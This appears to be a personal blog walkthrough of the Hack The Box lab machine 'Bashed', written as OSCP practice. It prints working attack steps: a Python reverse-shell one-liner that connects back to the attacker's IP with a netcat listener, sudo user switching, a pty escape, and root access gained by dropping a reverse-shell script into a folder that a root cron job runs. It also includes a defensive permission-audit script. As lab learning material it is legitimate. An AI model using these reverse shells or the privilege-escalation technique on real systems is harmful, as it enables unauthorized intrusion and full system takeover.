Super extended delay here.
So, some things I've been working on. I did the TCM Security PEH program. Why, you ask, if I already have the eJPT and CompTIA Security+? Well, because I like to learn, and I found it pretty cool to go over Windows Active Directory attacks. I still haven't signed up for the OSCP and I am slowly working through the TJNULL list of OSCP-like boxes.
Difficulty level: Easy
Time to complete: Let's talk
I plan on removing the time to complete because I don't think it matters when doing these challenges and even less if you are new to HTB or Kali. Your main goal should be understanding the services on the box and how to get access plus how to use these tools.
Also, I can't recommend the TCM PEH enough, even if you just watch the first few videos on setting up Kali, because he really walks you through what you should have on your system.
So to the box.
I will start with an Nmap scan to see what services are running on the machine.
-A = identifies the target OS, the services and their versions on the machine. This will also do a traceroute.
To put it simply, "-A" = -sC -sV -O --traceroute.
I think I need to write a script that does all of this kind of like AutoRecon.
So port 80 is open on the machine. This is pretty good because that means there is a website running here that I can potentially navigate to. So put http://10.10.10.68:80 into your browser.
A quick right-click and view source to look at the backend of the site. I don't see much there, so I run dirb in another window to discover any directories.
After a few mins of running this nothing really comes up.
So I am going to try dirbuster instead. Dirbuster is an OWASP tool that has a nice GUI.
If you are on the 2021 version of Kali and you are root, open up a new terminal as a regular user.
Another thing to note is that in here I specify some items:
File with list of dir/files:
php (I am just doing php since it's a PHP site)
After this runs for a few moments. Switch over to the Results/Scan information.
You should see a Directory Structure that lists out the structure of what is found. For each one, I will open it up to see if there is anything interesting there.
The first one I found is /php and boom, it shows an Index of /php (directory listing is enabled).
Here is a blog post that goes into a little detail about why you shouldn't leave this accessible to the internet.
This site doesn't show any cool results so I will keep going down the line of the results shown before.
Still nothing much to play around here.
So the search continues....
Clicking on the phpbash.php shows that I have a webshell.
So I am going to be honest here and outside of the webshell I don't know what www-data@bashed:/# is.
But you know what I did? I went back to Google lol.
To basically sum it up, www-data is the user the web server runs as. The files are not world writable and are restricted to their owner for writing, so if root were the owner, a compromised web server would have access to the entire system.
I am going to run ls -la in my current location to see what rights I have and if there is anything interesting. I see home and root there, so I am going to cd into them to see if I can find the txt files. Interestingly enough, I found the user.txt file in there.
Then I cat the txt file. I can't access the root file with my current permissions.
Let's see if I can get a reverse shell to my Linux terminal.
Some more quick googling and I come across a few reverse shells from HighOn.Coffee.
I tried the php one but no cigar though.
Let's give the Python one a try. I am trying this also because python is on the local Bashed machine.
On your Attacking Machine, set up Netcat:
root@kali: nc -lnvp 80
Run the following in the www-data@bashed:/ terminal (replace tun0-IP with your own tun0 address):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("tun0-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
So, success! I was able to get a reverse shell on my terminal. Let's see if I can switch users. Again, I don't know how to do this, so I am going to head over to Google to look.
I found the following issue request.
Then scroll down:
So I am going to give this a swing to see if I can switch users.
Run the following from the terminal. First list what sudo lets www-data run, then use it to switch to the scriptmanager user.
sudo -l
sudo -u scriptmanager /bin/bash
I was able to switch users and ran whoami to confirm.
Then I am going to try and cd into the root location, but no cigar, as you see below.
Bummer, but I am stuck in this weird TTY, so again, a quick Google.
Ahh this is pretty interesting.
From here I re-Google how to escape a TTY, and I found this.
Run the following from your terminal.
python -c 'import pty; pty.spawn("/bin/sh")'
This didn't work, so I tried switching to /bin/bash since that is what's on the main machine.
python -c 'import pty; pty.spawn("/bin/bash")'
Boom this allows me in.
I tried the root file again but no juice.
But there looks like a Scripts folder I can access so I will see what's in there.
So a few things are happening here:
- There is a test.py file that I own.
- There is a test.txt that appears to be updated every few minutes, meaning something is running the .py files.
Let's see if I can put a .py file in there.
echo > kali.py
Nice it works!
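As an added, defender-side example (not from the original post), here is a small audit that flags the exact weakness this box relies on: a root cron job executing .py files from a directory where a low-privilege user can write or add files. The helper names and the sample directory are hypothetical.

```python
import os
import stat
import tempfile
from pathlib import Path

# Hypothetical audit helper: report scripts in a cron-executed directory that a
# non-trusted user could modify. A file is flagged if it is not owned by a
# trusted uid, if it is group-/world-writable, or if it is a symlink; the
# directory itself is flagged if others can create files in it.
def audit_script_dir(script_dir, trusted_uids=frozenset({0})):
    findings = []
    d = Path(script_dir)
    dmode = d.stat().st_mode
    if dmode & (stat.S_IWGRP | stat.S_IWOTH) and not dmode & stat.S_ISVTX:
        findings.append((str(d), "directory writable by group/other: anyone can drop a new .py"))
    for entry in sorted(d.iterdir()):
        st = entry.lstat()
        if stat.S_ISLNK(st.st_mode):
            findings.append((str(entry), "symlink: cron may follow it to a file elsewhere"))
            continue
        if st.st_uid not in trusted_uids:
            findings.append((str(entry), f"owned by uid {st.st_uid}, not a trusted uid"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((str(entry), "group/world writable"))
    return findings

def build_sample_dir():
    # Constructed fixture mirroring the box: test.py is world-writable, safe.py is not.
    root = Path(tempfile.mkdtemp(prefix="scripts_"))
    (root / "test.py").write_text("print('hello')\n")
    os.chmod(root / "test.py", 0o777)
    (root / "safe.py").write_text("print('ok')\n")
    os.chmod(root / "safe.py", 0o644)
    os.chmod(root, 0o755)
    return root

def demo():
    # Treat the current user as the trusted owner so only the permission bits are judged.
    root = build_sample_dir()
    return audit_script_dir(root, trusted_uids={os.getuid()})

if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

On the real box, the fix is for the cron job to run only root-owned, non-writable scripts (or to run them as scriptmanager rather than root).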
So Pentest Monkey has another PHP reverse shell I can use, which I will attempt to use to get full root access on the machine.
You can find it here.
The main thing here is to edit these 2 lines for your tun0 IP and port.
So this is kind of up to you: use wget or copy/paste. I use wget to make it simpler.
After you get this on your machine do the following.
chmod 777 php-reverse-shell.php
Now use nano or your favorite editing tool to open the file.
To exit hit CTRL-X and select Yes to Save
Okay so now that you have this file you need to put this on your victim machine so that it can talk back to your Kali machine.
Use Python's simple local HTTP server to host it there.
python3 -m http.server 80
So on your victim machine you are going to use wget again to grab this file.
Then do the following for good measure.
chmod 777 php-reverse-shell.php
Now run the following in a new terminal.
nc -lnvp 1234
So maybe I was doing this wrong, but there was an uploads folder that it should allow us to direct to, though I could be wrong. I am going to try this again later to see where I may have gone wrong.
So I tried this a few times but it didn't work, so I attempted something else. I went back to Google to look for the Python reverse shell.
I had to edit the original script a little.
Change: tun0 IP
Use: the echo command, since you are trying to write a line of text/string that is passed as an argument into a file.
Then create a .py file to be run by the machine.
First start a netcat again on your machine with your port.
nc -lvnp 1234
Then on your other terminal drop the Python script into a file. The whole script must be wrapped in single quotes, otherwise the shell treats each semicolon as a command separator (replace tun0 with your own tun0 address):
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("tun0",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > bashed.py
On your Netcat terminal give it 1-2 mins to run, then you should see a connection.
Way to go!
Some things I want to touch on. I used Google a lot for this. Like, a lot! Also, I hit some rabbit holes, but I tried other things to get access to this machine. I am also trying to be as detailed as possible to show you exactly what I am doing to speed up your learning process. If you run into issues, knowing how to Google for the answers is your best option, but so is having a community to bounce ideas off of.
Get on a hacking Discord server, follow certain OSCP subreddits, go on IRC, etc. What I am saying is that no one does this alone. It's good to have a community to be in, to ask questions and read other people's comments.